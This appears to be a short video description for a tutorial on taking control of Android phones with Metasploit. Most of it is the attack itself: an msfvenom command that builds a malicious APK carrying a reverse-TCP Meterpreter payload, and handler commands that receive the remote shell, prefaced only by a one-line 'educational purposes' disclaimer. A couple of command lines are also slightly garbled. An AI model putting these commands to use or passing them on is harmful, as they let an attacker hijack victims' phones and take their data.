today guys we are going to see the #new# method(improved) of hacking(controlling) android devices using Metasploit
Disclaimer: this video is for educational purposes only !!! dont use this attack with out permission
commands needed for the attack are as follows
First Attack
Malicious Mobile APP
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=443 Rgame.apk
Setting up the Handler
1- msfconsole
2- use exploit/multi/handler
3- set payload android/meterpreter/reverse_tcp
4- set LHOST=Local IP
5- set LPORT=443
6- exploit